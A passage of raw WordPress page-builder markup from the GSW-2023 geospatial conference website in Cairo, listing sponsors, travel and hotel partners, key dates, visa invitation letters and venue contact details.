border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps 